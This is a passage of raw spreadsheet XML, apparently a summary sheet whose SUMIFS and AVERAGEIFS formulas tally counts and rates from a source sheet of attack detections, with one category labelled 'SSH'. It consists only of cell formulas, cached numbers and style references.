        <f>CV28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>13</v>
      </c>
      <c r="CW32" s="355">
        <f>CW28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CX32" s="355">
        <f>CX28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CY32" s="355">
        <f>CY28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>10</v>
      </c>
      <c r="CZ32" s="355">
        <f>CZ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DA32" s="355">
        <f>DA28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DB32" s="355">
        <f>DB28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DC32" s="355">
        <f>DC28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DD32" s="355">
        <f>DD28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>76</v>
      </c>
      <c r="DE32" s="355">
        <f>DE28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="DF32" s="355">
        <f>DF28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>26</v>
      </c>
      <c r="DG32" s="355">
        <f>DG28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DH32" s="355">
        <f>DH28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>911</v>
      </c>
      <c r="DI32" s="355">
        <f>DI28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DJ32" s="356">
        <f>DJ28-(SUMIFS('(B) - Detecciones - Ataques'!$M3:$M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>17</v>
      </c>
      <c r="DK32" s="271"/>
      <c r="DO32" s="357"/>
      <c r="DP32" s="398" t="s">
        <v>1725</v>
      </c>
      <c r="DQ32" s="399">
        <v>0.0</v>
      </c>
      <c r="DR32" s="399">
        <v>0.0</v>
      </c>
      <c r="DS32" s="399">
        <v>0.0</v>
      </c>
      <c r="DT32" s="399">
        <v>0.0</v>
      </c>
      <c r="DU32" s="399">
        <v>1.0</v>
      </c>
      <c r="DV32" s="271"/>
      <c r="DW32" s="400" t="s">
        <v>1725</v>
      </c>
      <c r="DX32" s="20">
        <v>0.0</v>
      </c>
      <c r="DY32" s="20">
        <v>0.0</v>
      </c>
      <c r="DZ32" s="20">
        <v>0.0</v>
      </c>
      <c r="EA32" s="20">
        <v>0.0</v>
      </c>
      <c r="EB32" s="20">
        <v>1.0</v>
      </c>
      <c r="EC32" s="271"/>
      <c r="ED32" s="280"/>
      <c r="EG32" s="279"/>
      <c r="EH32" s="271"/>
      <c r="EI32" s="358" t="s">
        <v>1725</v>
      </c>
      <c r="EJ32" s="401">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S31 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK32" s="401">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI32 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EL32" s="401">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI32 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EM32" s="401">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI32 &amp; "*")</f>
        <v>12</v>
      </c>
      <c r="EN32" s="402">
        <f t="shared" si="4"/>
        <v>12</v>
      </c>
      <c r="EO32" s="364"/>
      <c r="EP32" s="364"/>
      <c r="EQ32" s="364"/>
      <c r="ER32" s="364"/>
      <c r="ES32" s="364"/>
      <c r="ET32" s="364"/>
      <c r="EU32" s="364"/>
      <c r="EV32" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="EW32" s="389">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="EX32" s="389">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="EY32" s="389">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="EZ32" s="390">
        <f t="shared" si="11"/>
        <v>12</v>
      </c>
      <c r="FA32" s="367"/>
      <c r="FC32" s="281" t="s">
        <v>2473</v>
      </c>
      <c r="FD32" s="221"/>
      <c r="FE32" s="221"/>
      <c r="FF32" s="221"/>
      <c r="FG32" s="221"/>
      <c r="FH32" s="222"/>
      <c r="FK32" s="303" t="s">
        <v>427</v>
      </c>
      <c r="FL32" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK32 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="FM32" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK32 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="FN32" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK32 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="FO32" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK32,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK32 &amp; "*")</f>
        <v>14</v>
      </c>
      <c r="FP32" s="392"/>
      <c r="FQ32" s="303" t="s">
        <v>427</v>
      </c>
      <c r="FR32" s="69">
        <f t="shared" ref="FR32:FU32" si="13">1-(FL32/EJ34)</f>
        <v>0</v>
      </c>
      <c r="FS32" s="69">
        <f t="shared" si="13"/>
        <v>0.25</v>
      </c>
      <c r="FT32" s="69">
        <f t="shared" si="13"/>
        <v>0.1</v>
      </c>
      <c r="FU32" s="306">
        <f t="shared" si="13"/>
        <v>0.4814814815</v>
      </c>
      <c r="FV32" s="284"/>
      <c r="FW32" s="284"/>
      <c r="FX32" s="284"/>
      <c r="FY32" s="284"/>
      <c r="FZ32" s="284"/>
      <c r="GA32" s="284"/>
      <c r="GB32" s="284"/>
      <c r="GC32" s="284"/>
      <c r="GD32" s="284"/>
      <c r="GE32" s="284"/>
      <c r="GF32" s="284"/>
      <c r="GG32" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="GH32" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GI32" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GJ32" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GK32" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="GL32" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GM32" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GN32" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0.4285714286</v>
      </c>
      <c r="GO32" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="GP32" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GQ32" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GR32" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GS32" s="352" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSH")</f>
        <v>SSH</v>
      </c>
      <c r="GT32" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GU32" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GV32" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG32)</f>
        <v>0</v>
      </c>
      <c r="GW32" s="284"/>
      <c r="GX32" s="284"/>
      <c r="GY32" s="284"/>
      <c r="GZ32" s="284"/>
      <c r="HA32" s="284"/>
      <c r="HB32" s="284"/>
      <c r="HC32" s="284"/>
      <c r="HD32" s="284"/>
      <c r="HE32" s="284"/>
      <c r="HF32" s="284"/>
      <c r="HG32" s="284"/>
      <c r="HH32" s="284"/>
      <c r="HI32" s="284"/>
      <c r="HJ32" s="284"/>
      <c r="HK32" s="284"/>
      <c r="HL32" s="284"/>
      <c r="HM32" s="284"/>
      <c r="HN32" s="284"/>
      <c r="HO32" s="284"/>
      <c r="HP32" s="284"/>
    </row>
    <row r="33">
      <c r="B33" s="277"/>
      <c r="C33" s="271"/>
      <c r="D33" s="271"/>
      <c r="E33" s="271"/>
      <c r="F33" s="271"/>
      <c r="G33" s="278"/>
      <c r="J33" s="277"/>
      <c r="K33" s="352" t="s">
        <v>2472</v>
      </c>
      <c r="L33" s="403" t="s">
        <v>2474</v>
      </c>
      <c r="M33" s="403" t="s">
        <v>2475</v>
      </c>
      <c r="N33" s="404" t="s">
        <v>2476</v>
      </c>
      <c r="O33" s="278"/>
      <c r="Q33" s="271"/>
      <c r="R33" s="352" t="s">
        <v>2474</v>
      </c>
      <c r="S33" s="353">
        <f>S29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>2053</v>
      </c>
      <c r="T33" s="353">
        <f>T29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>0</v>
      </c>
      <c r="U33" s="353">
        <f>U29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>124</v>
      </c>
      <c r="V33" s="353">
        <f>V29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>12</v>
      </c>
      <c r="W33" s="353">
        <f>V29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>12</v>
      </c>
      <c r="X33" s="353">
        <f>X29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="Y33" s="353">
        <f>Y29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="Z33" s="353">
        <f>Z29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>8473</v>
      </c>
      <c r="AA33" s="353">
        <f>AA29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>146</v>
      </c>
      <c r="AB33" s="353">
        <f>AB29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>19</v>
      </c>
      <c r="AC33" s="353">
        <f>AC29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="AD33" s="353">
        <f>AD29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>1004</v>
      </c>
      <c r="AE33" s="353">
        <f>AE29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>6</v>
      </c>
      <c r="AF33" s="354">
        <f>AF29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>462</v>
      </c>
      <c r="AG33" s="271"/>
      <c r="AH33" s="352" t="s">
        <v>2474</v>
      </c>
      <c r="AI33" s="355">
        <f>AI29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2049</v>
      </c>
      <c r="AJ33" s="355">
        <f>AJ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AK33" s="355">
        <f>AK29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AL33" s="355">
        <f>AL29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AM33" s="355">
        <f>AM29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AN33" s="355">
        <f>AN29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AO33" s="355">
        <f>AO29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AP33" s="355">
        <f>AP29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AQ33" s="355">
        <f>AQ29-( SUMIFS('(B) - Detecciones - Ataques'!$N3:$N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>114</v>
      </c>
      <c r="AR33" s="355">
